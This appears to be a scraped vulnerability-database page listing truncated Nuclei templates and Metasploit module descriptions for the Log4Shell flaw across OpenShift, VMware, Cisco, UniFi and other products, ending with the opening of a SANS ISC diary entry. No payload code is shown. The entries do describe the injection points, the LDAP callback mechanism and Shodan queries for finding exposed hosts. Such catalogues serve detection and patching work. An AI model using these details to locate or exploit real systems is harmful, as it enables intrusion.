OpenShift is susceptible to Log4j JNDI remote code execution. OpenShift is a unified platform to build, modernize, and deploy applications at scale.
Template:
id: openshift-log4j-rce
info:
name: OpenShift - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
OpenShift is susceptible to Log4j JNDI remote code execution. OpenShift is a unified platform to build, modernize, and deploy applications at scale.
reference:
- https://access.redhat.com/security/cve/cve-2021-44228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
cpe: cpe:2.3:a:redhat:openshift_origin:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Open
Metasploit
VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)
metasploit
VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)
VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)
VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on Windows. This module will start an LDAP server that the target will need to connect to. This exploit uses the logon page vector.
Nuclei
VMware vRealize Operations Tenant - JNDI Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] VMware vRealize Operations Tenant - JNDI Remote Code Execution (Apache Log4j)
VMware vRealize Operations Tenant - JNDI Remote Code Execution (Apache Log4j)
VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application.
Template:
id: vrealize-operations-log4j-rce
info:
name: VMware vRealize Operations Tenant - JNDI Remote Code Execution (Apache Log4j)
author: bughuntersurya
severity: critical
description: |
VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application.
reference:
- https://www.vmware.com/security/advisories/VMSA-2021-0028.html
- https://core.vmware.com/vmsa-2021-0028-questions-answers-faq
- https://nvd.nist.gov/vuln/de
Nuclei
Graylog (Log4j) - Remote Code Execution
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Graylog (Log4j) - Remote Code Execution
Graylog (Log4j) - Remote Code Execution
Graylog is susceptible to remote code execution via the Apache Log4j 2 library prior to 2.15.0 by recording its own log information, specifically with specially crafted values sent as user input. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Template:
id: graylog-log4j-rce
info:
name: Graylog (Log4j) - Remote Code Execution
author: DhiyaneshDK
severity: critical
description: Graylog is suscep
Nuclei
Elasticsearch 5 - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Elasticsearch 5 - Remote Code Execution (Apache Log4j)
Elasticsearch 5 - Remote Code Execution (Apache Log4j)
Elasticsearch 5 is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: elasticsearch5-log4j-rce
info:
name: Elasticsearch 5 - Remote Code Execution (Apache Log4j)
author: akincibor
severity: critical
description: |
Elasticsearch 5 is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://www.horizon3.ai/the-long-tail-of-log4shell-exploitat
Nuclei
Cisco BroadWorks - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Cisco BroadWorks - Remote Code Execution (Apache Log4j)
Cisco BroadWorks - Remote Code Execution (Apache Log4j)
Cisco BroadWorks is susceptible to Log4j JNDI remote code execution. Cisco BroadWorks is an enterprise-grade calling and collaboration platform delivering unmatched performance, security and scale.
Template:
id: cisco-broadworks-log4j-rce
info:
name: Cisco BroadWorks - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Cisco BroadWorks is susceptible to Log4j JNDI remote code execution. Cisco BroadWorks is an enterprise-grade calling and collaboration platform delivering unmatched performance, security and scale.
reference:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/
Metasploit
UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)
metasploit
UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)
UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the /api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the server application. This module will start an LDAP server that the target will need to connect to.
Nuclei
Apache Code42 - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Apache Code42 - Remote Code Execution (Apache Log4j)
Apache Code42 - Remote Code Execution (Apache Log4j)
Multiple Code42 components are impacted by the logj4 vulnerability. Affected Code42 components include:
- Code42 cloud: Updated Log4j from 2.15.0 to 2.17.1 on January 26, 2022
- Code42 app for Incydr Basic and Advanced and CrashPlan Cloud product plans: Updated Log4j from 2.16.0 to 2.17.1 on January 18, 2022
- Code42 User Directory Sync (UDS): Updated Log4j from 2.15.0 to 2.17.1 on February 2, 2022
- On-premises Code42 server: Mitigated from Log4j vulnerabilities by following these steps
- On-premises Code42 app: Updated to Log4j 2.16 on December 17, 2021
Template:
id: code42-log4j-rce
info:
name: Apache Code42 - Remote Code Execution (Apache Log4j)
author: Adam Crosser
severity: critical
description: |
Multiple Code42 components are
Nuclei
Seeyon OA (Log4j) - Remote Code Execution
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Seeyon OA (Log4j) - Remote Code Execution
Seeyon OA (Log4j) - Remote Code Execution
Seeyon OA is susceptible to remote code execution via the Apache Log4j 2 library prior to 2.15.0 by recording its own log information, specifically with specially crafted values sent as user input. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Template:
id: seeyon-oa-log4j-rce
info:
name: Seeyon OA (Log4j) - Remote Code Execution
author: SleepingBag945
severity: critical
description: |
Seey
Nuclei
Citrix XenApp - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Citrix XenApp - Remote Code Execution (Apache Log4j)
Citrix XenApp - Remote Code Execution (Apache Log4j)
Citrix XenApp is susceptible to Log4j JNDI remote code execution. Citrix Virtual Apps is an application virtualization software produced by Citrix Systems that allows Windows applications to be accessed via individual devices from a shared server or cloud system.
Template:
id: citrix-xenapp-log4j-rce
info:
name: Citrix XenApp - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Citrix XenApp is susceptible to Log4j JNDI remote code execution. Citrix Virtual Apps is an application virtualization software produced by Citrix Systems that allows Windows applications to be accessed via individual devices from a shared server or cloud system.
reference:
- https://support.citrix.com/article/CTX335705
Nuclei
Pega - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Pega - Remote Code Execution (Apache Log4j)
Pega - Remote Code Execution (Apache Log4j)
Pega is susceptible to Log4j JNDI remote code execution. Pega provides a powerful low-code platform that empowers the world's leading enterprises to Build for Change.
Template:
id: pega-log4j-rce
info:
name: Pega - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Pega is susceptible to Log4j JNDI remote code execution. Pega provides a powerful low-code platform that empowers the world's leading enterprises to Build for Change.
reference:
- https://docs.pega.com/security-advisory/security-advisory-apache-log4j-zero-day-vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
cpe: cpe:2.3:a:pega:platform:*:*:*:*:*:*:*:*
Nuclei
Symantec SEPM - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Symantec SEPM - Remote Code Execution (Apache Log4j)
Symantec SEPM - Remote Code Execution (Apache Log4j)
Symantec SPEM is susceptible to Log4j JNDI remote code execution.
Template:
id: symantec-sepm-log4j-rce
info:
name: Symantec SEPM - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Symantec SPEM is susceptible to Log4j JNDI remote code execution.
reference:
- https://support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
cpe: cpe:2.3:a:symantec:endpoint_protection_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Symantec Endpoint Protection Manager"
product
Nuclei
FortiPortal - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] FortiPortal - Remote Code Execution (Apache Log4j)
FortiPortal - Remote Code Execution (Apache Log4j)
FortiPortal is susceptible to Log4j JNDI remote code execution. FortiPortal provides comprehensive security management and analytics within a multi-tenant, multi-tier management framework.
Template:
id: fortiportal-log4j-rce
info:
name: FortiPortal - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
FortiPortal is susceptible to Log4j JNDI remote code execution. FortiPortal provides comprehensive security management and analytics within a multi-tenant, multi-tier management framework.
reference:
- https://www.fortiguard.com/psirt/FG-IR-21-245
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77,CWE-502
cpe: cpe:2.3:a:fort
Nuclei
VMware Operations Manager - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] VMware Operations Manager - Remote Code Execution (Apache Log4j)
VMware Operations Manager - Remote Code Execution (Apache Log4j)
VMware Operations Manager is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: vmware-operation-manager-log4j-rce
info:
name: VMware Operations Manager - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK
severity: critical
description: VMware Operations Manager is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://ww
Nuclei
GoAnywhere Managed File Transfer - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] GoAnywhere Managed File Transfer - Remote Code Execution (Apache Log4j)
GoAnywhere Managed File Transfer - Remote Code Execution (Apache Log4j)
GoAnywhere Managed File Transfer is vulnerable to a remote command execution (RCE) issue via the included Apache Log4j.
Template:
id: goanywhere-mft-log4j-rce
info:
name: GoAnywhere Managed File Transfer - Remote Code Execution (Apache Log4j)
author: pussycat0x
severity: critical
description: GoAnywhere Managed File Transfer is vulnerable to a remote command execution (RCE) issue via the included Apache Log4j.
reference:
- https://www.goanywhere.com/cve-2021-44228-and-cve-2021-45046-goanywhere-mitigation-steps
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-202
Nuclei
Metabase - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Metabase - Remote Code Execution (Apache Log4j)
Metabase - Remote Code Execution (Apache Log4j)
Metabase is susceptible to remote code execution due to an incomplete patch in Apache Log4j 2.15.0 in certain non-default configurations. A remote attacker can pass malicious data and perform a denial of service attack, exfiltrate data, or execute arbitrary code.
Template:
id: metabase-log4j-rce
info:
name: Metabase - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK
severity: critical
description: Metabase is susceptible to remote code execution due to an incomplete patch in Apache Log4j 2.15.0 in certain non-default configurations. A remote attacker can pass malicious data and perform a denial of service attack, exfiltrate data, or execute arbitrary code.
reference:
- https://www.cybersecurity-help.cz/vdb/SB2021121706
- https://l
Metasploit
MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
metasploit
MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the tomcat user. This module will start an LDAP server that the target will need to connect to.
Nuclei
Spring Boot - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Spring Boot - Remote Code Execution (Apache Log4j)
Spring Boot - Remote Code Execution (Apache Log4j)
Spring Boot is susceptible to remote code execution via Apache Log4j.
Template:
id: springboot-log4j-rce
info:
name: Spring Boot - Remote Code Execution (Apache Log4j)
author: pdteam
severity: critical
description: Spring Boot is susceptible to remote code execution via Apache Log4j.
remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
reference:
- https://logging.apache.org/log4j/2.x/security.html
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cw
Nuclei
Apache Log4j2 - Remote Code Injection
nuclei·CVSS 10.0
CVE-2021-45046 [CRITICAL] Apache Log4j2 - Remote Code Injection
Apache Log4j2 - Remote Code Injection
Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
Template:
id: CVE-2021-45046
info:
name: Apache Log4j2 - Remote Code Injection
author: ImNightmaree
severity: critical
description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the latest security patches or upgrade to a non-vulnerable version of Apache Log4j2.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
- https://twitter.com/marcioalm/status/147174077158165
Metasploit
Log4Shell HTTP Scanner
metasploit·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4Shell HTTP Scanner
Log4Shell HTTP Scanner
Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include HTTP headers and the HTTP request path. Known impacted software includes Apache Struts 2, VMWare VCenter, Apache James, Apache Solr, Apache Druid, Apache JSPWiki, Apache OFBiz.
Nuclei
Ivanti MobileIron (Log4j) - Remote Code Execution
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Ivanti MobileIron (Log4j) - Remote Code Execution
Ivanti MobileIron (Log4j) - Remote Code Execution
Ivanti MobileIron is susceptible to remote code execution via the Apache Log4j2 library. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Template:
id: mobileiron-log4j-rce
info:
name: Ivanti MobileIron (Log4j) - Remote Code Execution
author: meme-lord
severity: critical
description: Ivanti MobileIron is susceptible to remote code execution via the Apache Log4j2 library. Apache Log4j2
Nuclei
Flexnet - Remote Code Execution (Apache Log4j)
nuclei·CVSS 7.5
CVE-2021-44228 [HIGH] Flexnet - Remote Code Execution (Apache Log4j)
Flexnet - Remote Code Execution (Apache Log4j)
Flexnet is susceptible to Log4j JNDI remote code execution.
Template:
id: flexnet-log4j-rce
info:
name: Flexnet - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Flexnet is susceptible to Log4j JNDI remote code execution.
reference:
- https://community.flexera.com/t5/Revenera-Company-News/Security-Advisory-Log4j-Java-Vulnerability-CVE-2021-4104-CVE/ba-p/216905
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77,CWE-502
cpe: cpe:2.3:a:flexera:flexnet_publisher:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Flexnet"
product: flexnet_publisher
vendor: flexera
tags: cve,cve2021,rce,jndi,log4j,flexnet,oast,kev,vu
Nuclei
Papercut - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Papercut - Remote Code Execution (Apache Log4j)
Papercut - Remote Code Execution (Apache Log4j)
Papercut is susceptible to Log4j JNDI remote code execution. Papercut is a print management system.
Template:
id: papercut-log4j-rce
info:
name: Papercut - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Papercut is susceptible to Log4j JNDI remote code execution. Papercut is a print management system.
reference:
- https://www.papercut.com/kb/Main/Log4Shell-CVE-2021-44228#product-status
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Papercut"
product: papercut_mf
vendor: papercut
tags: cve,cve2021,rce,jndi,log4j,papercut
Metasploit
Log4Shell HTTP Header Injection
metasploit·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4Shell HTTP Header Injection
Log4Shell HTTP Header Injection
Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload. The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server that the target can connect to. The targeted application must have the trusted code base option enabled for this technique to work. The non-Automatic targets deliver a payload via a serialized Java object. This does not requi
Nuclei
Cisco WebEx - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Cisco WebEx - Remote Code Execution (Apache Log4j)
Cisco WebEx - Remote Code Execution (Apache Log4j)
Cisco WebEx is susceptible to Log4j JNDI remote code execution. Cisco WebEx provides web conferencing, videoconferencing and contact center as a service applications.
Template:
id: cisco-webex-log4j-rce
info:
name: Cisco WebEx - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Cisco WebEx is susceptible to Log4j JNDI remote code execution. Cisco WebEx provides web conferencing, videoconferencing and contact center as a service applications.
reference:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77,CWE-502
cpe: cpe
Nuclei
VMware NSX - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] VMware NSX - Remote Code Execution (Apache Log4j)
VMware NSX - Remote Code Execution (Apache Log4j)
VMware NSX is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: vmware-nsx-log4j-rce
info:
name: VMware NSX - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK
severity: critical
description: VMware NSX is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://kb.vmware.com/s/article/87086
- https://logging.apache.org/log4j/2.x/securit
Nuclei
VMware VCenter - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] VMware VCenter - Remote Code Execution (Apache Log4j)
VMware VCenter - Remote Code Execution (Apache Log4j)
VMware VCenter is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: vmware-vcenter-log4j-rce
info:
name: VMware VCenter - Remote Code Execution (Apache Log4j)
author: _0xf4n9x_
severity: critical
description: |
VMware VCenter is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://www.vmware.com/security/advisories/VMSA-2021-0028.html
-
Nuclei
UniFi Network Application - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] UniFi Network Application - Remote Code Execution (Apache Log4j)
UniFi Network Application - Remote Code Execution (Apache Log4j)
UniFi Network Application is susceptible to a critical vulnerability in Apache Log4j (CVE-2021-44228) that may allow for remote code execution in an impacted implementation.
Template:
id: unifi-network-log4j-rce
info:
name: UniFi Network Application - Remote Code Execution (Apache Log4j)
author: KrE80r
severity: critical
description: |
UniFi Network Application is susceptible to a critical vulnerability in Apache Log4j (CVE-2021-44228) that may allow for remote code execution in an impacted implementation.
reference:
- https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e
- https://twitter.com/sprocket_ed/status/1473301038832701441
- https://logging.apache.org/log4j/2.x/se
Nuclei
Apache OFBiz - JNDI Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Apache OFBiz - JNDI Remote Code Execution (Apache Log4j)
Apache OFBiz - JNDI Remote Code Execution (Apache Log4j)
Apache OFBiz is affected by a remote code execution vulnerability in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process.
Template:
id: apache-ofbiz-log4j-rce
info:
name: Apache OFBiz - JNDI Remote Code Execution (Apache Log4j)
author: pdteam
severity: critical
description: |
Apache OFBiz is affected by a remote code execution vulnerability in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup
Nuclei
Cisco vManage (Log4j) - Remote Code Execution
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Cisco vManage (Log4j) - Remote Code Execution
Cisco vManage (Log4j) - Remote Code Execution
Cisco vManage is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. More information is available in the cisco-sa-apache-log4j-qRuKNEbd advisory.
Template:
id: cisco-vmanage-log4j-rce
info:
name: Cisco vManage (Log4j) - Remote Code Execution
author: DhiyaneshDK
severity: critical
description: Cisco vManage is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. More information i
Nuclei
Splunk Enterprise - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Splunk Enterprise - Remote Code Execution (Apache Log4j)
Splunk Enterprise - Remote Code Execution (Apache Log4j)
Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
Template:
id: splunk-enterprise-log4j-rce
info:
name: Splunk Enterprise - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
reference:
- https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html
classification:
cvss-metrics: CVSS:3.
Nuclei
VMware Site Recovery Manager - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] VMware Site Recovery Manager - Remote Code Execution (Apache Log4j)
VMware Site Recovery Manager - Remote Code Execution (Apache Log4j)
VMware Site Recovery Manager is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: vmware-siterecovery-log4j-rce
info:
name: VMware Site Recovery Manager - Remote Code Execution (Apache Log4j)
author: akincibor
severity: critical
description: |
VMware Site Recovery Manager is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- htt
Nuclei
VMware HCX - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] VMware HCX - Remote Code Execution (Apache Log4j)
VMware HCX - Remote Code Execution (Apache Log4j)
VMware HCX is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: vmware-hcx-log4j-rce
info:
name: VMware HCX - Remote Code Execution (Apache Log4j)
author: pussycat0x,DhiyaneshDK
severity: critical
description: VMware HCX is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://www.vmware.com/security/advisories/VMSA-2021-0028.html
- https://
Nuclei
VMware Horizon - JNDI Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] VMware Horizon - JNDI Remote Code Execution (Apache Log4j)
VMware Horizon - JNDI Remote Code Execution (Apache Log4j)
VMware Horizon is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: vmware-horizon-log4j-rce
info:
name: VMware Horizon - JNDI Remote Code Execution (Apache Log4j)
author: johnk3r
severity: critical
description: |
VMware Horizon is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-
Nuclei
F-Secure Policy Manager - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] F-Secure Policy Manager - Remote Code Execution (Apache Log4j)
F-Secure Policy Manager - Remote Code Execution (Apache Log4j)
F-Secure Policy Manager is susceptible to Log4j JNDI remote code execution.
Template:
id: f-secure-policymanager-log4j-rce
info:
name: F-Secure Policy Manager - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
F-Secure Policy Manager is susceptible to Log4j JNDI remote code execution.
reference:
- https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
max-request: 1
shodan-query: html:"F-Secure Policy Manager"
tags: cve,cve2021,rce,jndi,log4j,fsecure,oast,kev,vuln
variabl
Nuclei
Logstash - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Logstash - Remote Code Execution (Apache Log4j)
Logstash - Remote Code Execution (Apache Log4j)
Logstash is susceptible to Log4j JNDI remote code execution. Logstash is a free and open server-side data processing pipeline that ingests data from a multitude of sources, transforms it, and then sends it to your favorite "stash."
Template:
id: logstash-log4j-rce
info:
name: Logstash - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Logstash is susceptible to Log4j JNDI remote code execution. Logstash is a free and open server-side data processing pipeline that ingests data from a multitude of sources, transforms it, and then sends it to your favorite "stash."
reference:
- https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476
classif
Sans Isc
What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary], (Wed, Jun 24th)
blogs_sans_isc·2026-06-25
CVE-2016-20017 What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary], (Wed, Jun 24th)
What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary]
Published: 2026-06-24. Last Updated: 2026-06-25 00:39:08 UTC
by Nicole Phillips, SANS.edu BACS Student (Version: 1)
0 comment(s)
[This is a Guest Diary by Nicole Phillips, an ISC intern as part of the SANS.edu BACS program]
"I was just sitting here enjoying the company. Plants got a lot to say, if you take the time to listen."
— Eeyore, Winnie the Pooh
Introduction: Listening to the Static
